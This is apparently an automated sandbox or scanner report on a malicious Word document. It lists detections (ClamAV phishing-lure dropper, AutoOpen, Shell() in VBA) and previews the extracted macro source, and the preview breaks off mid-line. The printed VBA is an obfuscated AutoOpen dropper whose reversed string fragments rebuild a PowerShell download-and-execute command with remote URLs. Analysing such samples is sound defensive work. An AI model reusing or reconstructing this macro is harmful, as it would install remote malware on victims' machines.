Verdict: MALICIOUS
Risk Score: 242
Heuristics: 7
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24009 bytes | 65e4717db24ffe0ff3b45f444e749045049464adb6f844258311a0470b11d997 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "fTMzuncvU"
Sub AutoOpen()
On Error Resume Next
nLvjEMRFY = hdHoSfVOBrIK - IsauLti / (3917045 + tjDNbaAOinwC - 4023448 + SOqBOZpkdcImr)
dSFMqQzjX = EDuOnNVMAnAH - VrTusJFaFpj / (4440474 + YbHmUIudlzULBX - 1715485 + HzqVmkUXW)
HZRKzOLrr = uEOSsNBjuwjql - JwqsBJnGkPNicT / (7396354 + JTKiOMsjzIkA - 4914212 + mRoUAAYSph)
Application.Run "HwkTnBLf", qUUcDXczYFwhC
AnTwFKkiz = pPjDizGJ - tYnhLdwuITlKqi / (5441825 + bttbnYCDNiXk - 7145958 + DuOXwJNGHVJQ)
bOLBzlDVG = NiHUWjT - GLJVQrwTiTT / (4126528 + XRXwnrLjljPj - 9871583 + fQbndmiPwGGw)
End Sub
Function qUUcDXczYFwhC()
On Error Resume Next
JFNfiiupLpK = azTBRuWX - hdMtUVMLUVP / (6272366 + FiwtsuEhQMqjsa - 6306553 + UjNjFMmWb)
ibYPww = jEfOXRdfulD - BbSsRQWMcu / (6054655 + zmBzotvcSMNzBB - 7850936 + DMjvLwhmQM)
XviHf = VzPDmZiOlPjrAp - FpNTqPbwIPN / (6985825 + DEPhbzZcDIba - 3628744 + DKXVjFkrrYwW)
zwZYEQuMkzM = jUBCRrisj + Mid(StrReverse("XtUXqKabAjHbWi+gawyXr'+'KrzkFucsPEcbvKj"), 16, 10)
bmWwXbNlk = DPwBhltXc - mluhfBLNrk / (1132595 + fZwUDlWbW - 1912944 + GcpmpKmDwD)
mRWJk = QVtqJuATIO - lkYFMiHB / (261587 + cMnEpPW - 505743 + jHOKJba)
odCMzORk = bbaDBKzr - NkzDwwC / (3846768 + IGlUfiQEhBXZP - 5701545 + VjaazbCqNkBl)
QXjuztL = uDGoYowLjAw + Mid(StrReverse("fKaWaWLjwaQhtXCnAvZhKRAZwniregaw+gaw'+'tagaw+gawc-sgaw+g'+'awsgaw+gawibBaX+BaXmi//:pt'+'th?/EWlTN/mga'+'w+gawoc.aiiiGUjXh"), 8, 90)
JnCvdDRA = bHwwnwdvUf - GLiPWbWLGPYjds / (2244805 + wqLjuKS - 8940164 + idKiYutEDi)
iodcIsmQORc = SUokUJMECXSEbt - FJwEwsnrswL / (6336119 + VfiaNRkcBaPk - 9629042 + rBLZjlsok)
ziEYBcDT = wiBfdwlI - fiXsrqJJEEi / (6382553 + wiwpjZcvoj - 9020736 + biQFwEoGHS)
rsmHflCOwlb = AkLMqVS + Mid(StrReverse("GKqqGWvJSwvIrRvuuwTshgRzP+RzPa'+'w+gaw4.'+'cfRzP+'+'RzPsaygaw+gawRzP+RzPXrgaw+gaw(gaw+gaw'+'sgaw+gawh4gaw+ga'+'weRzP+RzPlILZIFR'+'zP+RzP'+'gaw+gawdaOILZlnWILZoDRz'+'P+RzPsgaw+g'+'awBaX+BaXh4.gaw+gawUYYyamfjnuUtNMswnfoTdKlIT"), 22, 184)
JVkMQTuwUA = XinQMjjqCcWP - sDFztaMf / (9755066 + hMrCTAwsvzt - 8760242 + LocaacdrmE)
WGKCkpm = jYjkJASFYG - DVdNqFk / (5160787 + SzhuLQAlC - 4147682 + uHVWvQMjuioV)
TJdTIa = EkGwNlXGL - DhqpYsAhCCVL / (9243606 + HSZtAjo - 5786284 + RpaKDXQwiiV)
hNHhWI = TIUiZcokCbi + Mid(StrReverse("dhswTVZClpgaw+gaw.gnigagaw+gawtsgaw+gaw-sgaw'+'+gawda/gawBaX+BaX'+'+gaw'+'/gaRzP+RzPw+gaw:p'+'tgaw+gawth?/CBaX+BaX1Sgaw+gawjT"), 3, 115)
bYiADtkkLI = toFpvMdGfzZCZA - hwKmErcajSNwGI / (7251161 + sLXvlENbEUXDX - 8473782 + fboKzmzNCQOW)
IVTfFw = hNWztFjrBE - ciihjTZC / (8258579 + iXRwnFtzVfX - 6508630 + uqzZJRLudWchP)
WFzLnalm = RiirLfr - qFzGAmtjZpusoq / (7284871 + PlfkEApRYCcTmn - 2365201 + wvAsaDR)
VDrRN = pEbnruwlS + Mid(StrReverse("kllugawtVIC+BaX+BaXgaw+'+'gaBaX+BaXwVgaw+BaX+RzP+RzP'+'B'+'aXgawIgaw+'+'g'+'awCgBaX+BaXaw+gawcgaw+gawegaw+'+'gawjbo'+'-wVIC+V'+'gaw+gawICegaw+'+'gawVIC+VIBaX+'wTHDrbXzAwjjkXAzGFBvfRiDLz"), 27, 155)
RNoVUw = aAGupPihzKZ - lctttqtUMTHjHC / (456517 + CmCbwMmBrAK - 5560744 + WTOcDMKtcWjzU)
dHBfQlk = GtXmnNDfK - wvYqrCsj / (3147059 + qAsHDqrlZQS - 5427724 + zjIUNXPorIG)
mTIJIAfPz = InTBadDirZG - QjwVRFu / (7931167 + RbKjhiIAnz - 8324909 + dvCXjwnPtmYZ)
bPuSboYC = BzznmWPaso + Mid(StrReverse("OiCoWXXrzhhgawIgaw+gBaX+BaXawC(&;)CDSyXr ,gaw+gaw)(gaw+gawshgaw+RzP+RzPgaw4RzP+Rz'+'PgNIgaw+gawLZgaBaX+BaXw+gawiILZrgaw+gawtSga'+'w+gawoNnMRUndC"), 9, 125)
GdosREmtUTd = qMJSszuh - aONmnuz / (6544815 + HZcfCkbd - 9908477 + GRNcVWEqORGn)
fljwo = LiwKtRrjwo - HriLJYrPzMb / (7393965 + msQjEiQA - 3738826 + RwEZhLI)
rnswJrj = JciVirs - pZqnIkvlYBB / (1568303 + NXinmNOEzJE - 8361922 + RJdQOZqX)
EUsHPi = EiauWlOR + Mid(StrReverse("PnNivJovuotbT)'x'+]5[CIlbUP:vne$+]31[ciLbUp:Vne$ ( & |)42qCPZzzzHfbIRj"), 14, 44)
jqSuUQvYiFa = hrdibqQ - wwSmIHncRFUj / (3816357 + qjOlwdur - 7302091 + EZjWvMvDaY)
FszdD = zOOKtthiTbYk - AwPpsmrFMw / (6514770 + YQjFJ
... (truncated)